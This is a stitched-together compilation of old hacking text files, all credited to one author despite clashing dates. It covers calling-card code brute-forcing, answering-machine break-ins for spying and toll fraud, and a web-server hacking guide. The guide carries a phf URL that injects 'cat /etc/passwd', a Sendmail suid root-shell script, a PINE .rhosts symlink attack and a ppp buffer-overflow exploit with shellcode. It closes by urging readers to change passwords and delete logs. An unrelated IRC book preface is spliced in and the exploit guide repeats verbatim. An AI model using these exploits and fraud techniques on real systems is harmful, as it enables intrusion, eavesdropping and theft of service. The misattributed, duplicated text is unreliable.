Pyromania Publishing Article #0006 --------------------------------------- Title| Hacking Calling Cards By | Anoj Shrestha Date | September 23, 1987 Call | the Pyromania BBS! 3o1-xxx-xxxx Note | Sorry about 40 columns but I | prefer the larger characters. --------------------------------------- Phreak codes are fast running out, and people are getting caught. Its time to pioneer a brand new industry. So far I think this file is original, so I am writing it. Most, if not all people have calling cards from AT&T. They can be used from any phone to dial long distance and charge it to your AT&T bill. The objective, to use someone elses card to get free long distance service. These codes are not traced, and they are only FOUR digits! The nice part is you can hack the code for anyone you like and attack a specific person, not a random name like when hacking MCI. Take your worst enemy, when you know his phone number, its the end... Format: a. Dial 0. b. Dial phone number with area code. c. Wait for tone. d. Dial billing number with or without area code. If your code is correct, the fone will ring. If it is not correct a recording will say "Please dial your card number again, the card number you have dialed is invalid". You can try another four digits but after that it will tell you to call AT&T if it is still invalid. This is more of a pain to hack because there are a thousand possible codes for each phone number. Just make a short basic program to do the job of dialing all the codes. its best to do a random scan instead of sequential in my opinion. If you have something you can add to this file then please tell me...

Cable Scrambling News by Anoj Shrestha ------------------------------------------------------------------------------- CABLE COMPANYS RESPONSIBLE FOR THEFT OF SERVICE A 1986 Showtime/The MOvie Channel study that showed the cable industry itself responsible for half the theft of service (1.4 Billion/year), in the country may have understated the extent of the problem, according to panelists at a recent NCTA convention session on cable piracy. Jerimy Stern, ex director of the OCST (Office od Cable TV Theft) which is a joint venture funded by the NCTA and the MPAA (Motion picture Assc. of America) stated that many cases of unauthorized reception occur through error or omission on the part of the cable companys and not through any willful, malicious or criminal intent on the part of the viewer. Loosely managed "Hot Disconects" programs are the primary problem. The "Hot" cable is left in the home to simplify reconnection when the new resident moves in. One panelist described a "tap verification" audit he did of 18,000 homes, in which they found 332 basic and 1w=2 unauthorized hookups. After identifying a pirate, a "sales specialist" was sent out to sign him up. They found 23% were willing, making the program highly profitable. Cable companys are now following this lead and are setting up their own "tap audit" programs. The OCST has also become active in the prosecuting of dealers of pirate decoders (currently a highly profitable business) using third party resourses of the FBI and Customs Service. Customs is trying to cut the flow of off shore decoders (Tiawan) being imported. Civil suits are being used sparingly because of their high cost, the possibility of receiving nothing in return and the possibility of countersuits for false prosecution. When a suit is won the PR people are quick to publicize it thru the media.

Hacking AT&T Answering Machines Quick and Dirty by Anoj Shrestha Written Today / 14-SEP-2011 (c) 1995 Communications 1. Dial telephone and wait for AT&T Answering Machine to answer. 2. Quickly Enter the following string. 1234567898765432135792468642973147 (btw: this is the shortest 4193366994488552277539596372582838 string for entering every 491817161511026203040506070809001 possible 2-digit combo.) 3. You'll know you hit the code because the messages will start playing. 4. Heres a list of TouchTone(c) Commands Listen to messages: 7 Listen to new messages: 6 Stop: # Rewind Tape: 2 Advance Tape: 5 Clear Messages: 3,3 Record memo: * Record Announcement: 4,* Play Announcement: 4,1 Turn System On: 0 Turn System Off: 8,8 **************************************************************************** *** oleBuzzard's kn0wledge phreak ** kn0wledge phreak World Wide Web Site ** ** AC 719.578.8288 / 28.8oo-24oo ** http://www.uccs.edu/~abusby/k0p.html *** ****************************************************************************

*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/* Hacking Answering Machines 1990 */*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/* By: Anoj Shrestha AT&T reports that in the year 1990, 11 million people will buy an answering machine for their home use. In 1989, 10 million machines were sold. Everyone has called up a person at one time or another and got the old "leave your name at the beep" message. With this increase in homes using these machines there is also a new form of hacking developing. One of hacking an answering machine. Why would anyone even want to hack an answering machine and for what purpose? There are many reasons and things you can do once you have control of someone elses machine. If for some reason you need to spy on a business or person you can hack their machine and take control using the information for your own personal use. There is also the old "change the message" secret to make it say something to the effect of this line accepts all toll charges so you can bill third party calls to that number. You can also use an answering machine for your own personal use, as in making it your own voice mail type system for people to call. Only do this if you know someone is out of town. If they come home from shopping and find their machine changed it might cause problems. With these basic ideas in mind you can see hacking an answering machine could be very useful to certain individuals. How can a person hack an answering machine? Well most answering machines built now have remote access features which allow the owner, or anyone to call in and press a security code to play their messages. This is where the fun begins. Some older models don't have remote access so you cannot do anything to them. Also if you know someone has a machine but you call and it doesn't answer, let the phone ring about 15 times. This will tell the machine to turn itself on, so you can hack it. The actual number varies between machines. To practice hacking some machines i will show you how to get remote access on a few models. Just look and see what kind your friend has and hack it for starters. Record a Call- Model 2120 ------------------------- Call in and during the message or after the beep tone to leave a message enter the 3 digit security code. Which you must find yourself. This will rewind the tape and play all new messages. Press 2 to backspace and repeat the last message. Press 3 to fast foward the tape. Changing your message from remote. Call your phone and enter the secret code. After several rapid beeps enter your secret code again. After a short delay you will hear a long tone. After the tone ends begin speaking your message which may be 17 seconds in length. When finished press the second digit of your secret code to end. The machine will then save your message and play it back. To turn the unit on from remote let it ring 11 times then hangup. Or stay on and it will answer so you can access the machine. For express calls or frequent calls hit the second digit for two seconds to skip the out going message announcement. Goldstar- Models 6000/6100 -------------------------- Call and enter your 1 digit secret code after you hear the out going message announcement. The machine will then play back new messages. Hangup to save messages or after all messages have been played the machine will give a double beeptone, you may enter your code to erase all messages. You cannot change the out going message on this unit. Cobra- Model AN-8521 -------------------- For this machine there are 2 codes. Both are one digit in length. The first one is the play code. The second is to erase messages from remote. After the outgoing message and beeptone press the play code for 2 seconds to play messages. After each message ends there will be a single beep. At the end of all message it will beep twice. You may then do the following. Replay by pressing the play code again. Erase messages by pressing the erase code. Hang-up and save messages and continue to take additional calls. To turn this unit on from remote you must let it ring 16 times before it will activate. If it rings 10 times then you hear 3 beeps it is full and messages need to be erased. Uniden- Model AM 464 -------------------- This model is one of the more advanced when it comes to remote capabilities. The factory preset security code is 747. This can be changed to as many as five digits of your choice. To gain access from remote type your security code while the outgoing message is playing. Press 1 after hearing the tone and the machine will rewind and play your messages. To fast foward press 7, to resume normal playback press 8. To stop the messages from playing press 8 again. Press 8 to restart the messages or 1 to start from the beginning again. Press 9 to rewind and 8 to resume playing. If you rewind all the way it will beep twice. You need to press 1 to play messages.To save messages press 4. To erase press 6. To turn the machine off from remote press 5 after all messages have been played and the machine beeps twice. To turn the machine on from remote let the phone ring 12 to 14 times. The machine will beep and then you enter your remote code. This will then turn your machine to answer mode. This machine also has room monitor options. This allows you to listen to what is going on in the room of the machine. To do this call the machine enter your security code after the beep press 0. The monitor stays on for 60 seconds. You will be warned with 2 beeps at 45 seconds. To continue press 0 again.To change the outgoing message from remote erase all the messages. Then call back and enter your code after the tone press 3. It will beep again and you may then leave your new message. Press 3 when finished. To change the security code from remote after the beep press # then 1 after the next beep enter your new code followed by the # again. There is also a call break through where you enter 256 while the outgoing message is playing. This will alarm the persons in the house someone is calling with a series of loud beeps. Press the * key to stop. Code-a-phone Model 930 ---------------------- To access from remote call and enter your security code after the announcement and tone. Press your code for 3 full seconds. After the new messages have been played you will hear 2 tones. You may then save messages by pressing your code then hanging up. repeat by entering code wait for 4 tones then enter code again. To erase message hangup when the tape is done playing. To turn the machine on from remote call and let ring ten times. When the system answers it will have a two second tone. Press your security code. You will hear three double tones to let you know the system is on. Unisonic- Model 8720 -------------------- One digit code entered after the outgoing message and tone will allow you to hear messages. To change message wait till all new messages have been played 2 beep tones will be heard. Press code for four seconds. Two beeps will be heard then the tape will rewind and beep again. Now leave the new message. Press your code when finished to save new outgoing message. New message will play for you to hear. Panasonic- Model KX-T2427 ------------------------- Call and enter the three digit code during the outgoing message. Machine will beep once, then beep amount of times equal to messages. Then rewind and play messages. There will be three beeps after the last message. Six beeps means the tape is full. Press 2 to foward. Press 1 to rewind. Press 3 to reset machine and erase messages. To monitor the room press 5 after the beeps indicating the number of messages the machine has. Press 7 to change the outgoing message, it will beep a few quick times rewind then a long beep will be heard. Leave new message press 9 when finished. Press 0 right after the beep tones to shut the machine off. To turn the machine on let it ring 15 times then hangup after machine turns on. Panasonic- Model KX-T2385d -------------------------- During the outgoing message enter the 1 digit code. This will playback messages. Press the code again to rewind. After the messages have played the machine will beep three times. Press your code again and it will reset the machine. For remote turn on let phone ring 15 times. Then after the outgoing message hangup. AT&T- Model 1504 ---------------- Enter 2 digit code before or after announcement. System will beep after each message and five times when messages are done. Press the # key anytime to pause. Hanging up will save messages. Press 7 and it will rewind and play messages again. Press 5 to fast foward. Press 2 to rewind. Press 33 after all messages have been played to reset without saving messages. To record onto the tape press * after the system answers. This will then beep and you may leave a four minute message on the tape. Press # when done. This is not an outgoing message announcement, only a memo. To turn on from remote let ring ten times press 0 when system answers. To turn the system off dial and enter your code. Press 88 and it will shut the machine down. Phonemate- Model 4050 --------------------- Enter your 3 digit code during the outgoing message. Pressing * or # will allow you to scan through the messages. When finished pressing 1 will replay the messages. Pressing 2 will erase them. To turn on from remote let ring for 15 times. Then proceed with remote operations. Phonemate- Model 7200 --------------------- Enter 1 digit code during of after the outgoing message. A voice will tell you how many messages you have, then play them back for you. To rewind press your code and hold it for however long you want to rewind. Let go and it will resume playing. After the last message a voice will prompt you with a list of options. You have five seconds to respond or it will proceed to the next option. These are as follows. The first is hanging up to save messages. Next is enter code to replay messages. Next enter code to erase messages. Last is enter code to change greeting. Follow the voice and it will give you complete directions on exact steps to follow. To turn on from remote let ring ten times then hang up. If tape is full it will say sorry tape is full, enter code and erase messages. Spectra Phone- Model ITD300 --------------------------- Enter your 1 digit code after the greeting. Messages will play back. Hanging up will save them. Or wait for four beeps and press your code to replay them. To erase press your code after 2 beeps. To turn the machine on from remote let it ring 10 times. Notes: Outgoing message and greeting is what you hear when you first call. Code is your personal security code. Hacking answering machines can be very easy. It can also help you obtain valuable information. If you have a targeted machine you can try going to a store and saying you just bought one and it didn't have instructions in the box. They will usually give you a set or make copies for you. This basic guide is just to introduce you to answering machine hacking and changing the outgoing message and listening to messages left by callers. To keep your own machine safe purchase one with a changeable security code of 3 or more digits. Most home machines are of the 1 digit type and are easy to hack. I have no knwoledge of the laws concerning hacking into someones answering machine. I am sure once it becomes more common we will find out. Of course this article is for informational purposes only so you would never have to find out the actual laws. Taken from TAP Magazine Issue #100 X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X Another file downloaded from: NIRVANAnet(tm) & the Temple of the Screaming Electron Jeff Hunter 510-935-5845 Burn This Flag Zardoz 408-363-9766 realitycheck Poindexter Fortran 510-527-1662 My Dog Bit Jesus Suzanne d'Fault 510-658-8078 New Dork Sublime Demented Pimiento 415-864-DORK The Shrine Tom Joseph 408-747-0778 "Raw Data for Raw Nerves" X-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-X

Author : Anoj Shrestha Well Psychotic wrote one of the most helpful unix text files in cyberspace but with the mail that we recieved after the release of our famous 36 page Unix Bible we realised that unix isn't for everybody so we decided that we should write on another aspect of hacking..... Virtual Circuit and Psychotic is proud to release, "Hacking Webpages With a few Other Techniques." We will discuss a few various ways of hacking webpages and getting root. We are also going to interview and question other REAL hackers on the subjects. Getting the Password File Through FTP Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file... root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file. root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file: root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well. Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it. Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you. The PHF Technique Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it. The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link: http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for http://www.webpage.com/ you would type: http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd and that's it! You just sit back and copy the file(if it works). Telnet and Exploits Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need. It’s best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I’m going to list a few below but the list of exploits is endless. This exploit is known as Sendmail v.8.8.4 It creates a suid program /tmp/x that calls shell as root. This is how you set it up: cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi and now on to another exploit. I’m going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile. Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile. This was writen by Sean B. Hamor…For this example, hamors is the victim while catluvr is the attacker: hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors now on to another one, this will be the last one that I’m going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up: v #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } Now that you’ve gotten root "what’s next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your worstJ Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learing ethnical hacking that you download our Unix Bible.

IRC ( Internet Relay Chat) may very well turn out to be the world's most successful hack. In 1988, Jarkko Oikarinen wrote the original IRC program at the University of Oulu, Finland. As he says in his forward, IRC started as one summer trainee's programming exercise.

A hack grew into a software development project that hundreds of people participated in, and then became a worldwide environment where tens of thousands of people now spend time with each other. I have found many of my friends through IRC and learnt a significant part of my present software engineering knowledge while using and working with IRC.

That would not have been possible without learning from code examples and hacks from others. IRC has continued to grow in popularity since its inception. Millions of people from all over the world now use IRC to chat with friends, discuss projects and collaborate on research. With a simple, clearly defined protocol, IRC has become one of the most accessible chat environments, with clients written for a multitude of operating systems.

And IRC is more than just a simple chat system it is a network of intercommunicating servers, allowing thousands of clients to connect from anywhere in the world using the IRC protocol. While IRC is easy to get into and many people are happy to use it without being aware of what s happening under the hood, there are those who hunger for more knowledge, and this book is for them.

IRC Hacks is a collection of tips and tools that cover just about everything you'd need to become a true IRC master, featuring contributions from some of the most renowned IRC hackers, many of whom collaborated on IRC, grouping together to form the channel #irchacks on the freenode IRC network (irc.freenode.net).

 Like all of our Hacks books, there are many different ways to use IRC Hacks. You can read the book from cover to cover, but you might be better served by picking an interesting item from the table of contents and just diving in. If you're relatively new to IRC, you should considering starting with a few hacks from each progressive chapter.

 Chapter 1 starts you off by showing you how to connect to IRC, while Chapter 2 acquaints you with the everyday concepts you'll need to use IRC effectively. Chapter 3 is all about users and channels, and introduces the first pieces of code. Chapter 4 shows you how to make useful enhancements to IRC clients. Chapter 5 is where you will learn the basics about creating IRC bots, with Chapters 6-12 introducing more complex bots that can be used for logging, servicing communities, searching, announcing, networking, managing channels or simply for having fun. Chapter 13 delves into the IRC protocol in more detail, and Chapter 14 demonstrates some interesting alternative methods for connecting to IRC.

 Finally, Chapter 15 will move you on to new pastures by showing you how to set up your own IRC server. This book presents an opportunity to learn how IRC works and how to make best use of some of the features that have made it the most successful, most scalable, and most mature chat system on this planet. IRC Hacks delves deep into the possibilities.

Getting the Password File Through FTP Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file... root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file. root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file: root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well. Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it. Cracking a password file isn't as complicated as it would seem, although the files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you. The PHF Technique Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it. The phf technique is by far the easiest way of getting a password file(although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link: http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for http://www.webpage.com/ you would type: http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd and that's it! You just sit back and copy the file(if it works). Telnet and Exploits Well exploits are the best way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Before you can setup an exploit you must first have a telnet proggie, there are many different clients you can just do a netsearch and find everything you need. It’s best to get an account with your target(if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I’m going to list a few below but the list of exploits is endless. This exploit is known as Sendmail v.8.8.4 It creates a suid program /tmp/x that calls shell as root. This is how you set it up: cat << _EOF_ >/tmp/x.c #define RUN "/bin/ksh" #include main() { execl(RUN,RUN,NULL); } _EOF_ # cat << _EOF_ >/tmp/spawnfish.c main() { execl("/usr/lib/sendmail","/tmp/smtpd",0); } _EOF_ # cat << _EOF_ >/tmp/smtpd.c main() { setuid(0); setgid(0); system("chown root /tmp/x ;chmod 4755 /tmp/x"); } _EOF_ # # gcc -O -o /tmp/x /tmp/x.c gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c gcc -O3 -o /tmp/smtpd /tmp/smtpd.c # /tmp/spawnfish kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1` rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c sleep 5 if [ -u /tmp/x ] ; then echo "leet..." /tmp/x fi and now on to another exploit. I’m going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile. Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts(for a generic example) will cause PINE to create ~hamors/.rhosts as a 666 file with PINE's process id as its contents. One may now simply do an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile. This was writen by Sean B. Hamor…For this example, hamors is the victim while catluvr is the attacker: hamors (21 19:04) litterbox:~> pine catluvr (6 19:06) litterbox:~> ps -aux | grep pine catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors - -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4 catluvr (8 19:07) litterbox:~> ps -aux | grep pine catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4 hamors (23 19:09) litterbox:~> pine catluvr (11 19:10) litterbox:~> ps -aux | grep pine catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4 catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4 + + catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4 catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors now on to another one, this will be the last one that I’m going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up: v #include #include #include #define BUFFER_SIZE 156 /* size of the bufer to overflow */ #define OFFSET -290 /* number of bytes to jump after the start of the buffer */ long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char *argv[]) { char *buf = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" /* 16 bytes */ "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" /* 16 bytes */ "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01" /* 20 bytes */ "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; /* 15 bytes, 57 total */ int i,j; buf = malloc(4096); /* fill start of bufer with nops */ i = BUFFER_SIZE-strlen(execshell); memset(buf, 0x90, i); ptr = buf + i; /* place exploit code into the buffer */ for(i = 0; i < strlen(execshell); i++) *ptr++ = execshell[i]; addr_ptr = (long *)ptr; for(i=0;i < (104/4); i++) *addr_ptr++ = get_esp() + OFFSET; ptr = (char *)addr_ptr; *ptr = 0; setenv("HOME", buf, 1); execl("/usr/sbin/ppp", "ppp", NULL); } Now that you’ve gotten root "what’s next?" Well the choice is up to you but I would recommend changing the password before you delete or change anything. To change their password all you have to do is login via telnet and login with your new account. Then you just type: passwd and it will ask you for the old password first followed by the new one. Now only you will have the new pw and that should last for a while you can now upload you pages, delete all the logs and just plain do your worst Psychotic writes our own exploits and we will be releasing them soon, so keep your eyes open for them. We recommend that if you are serious about learing ethnical hacking that you download our Unix Bible.

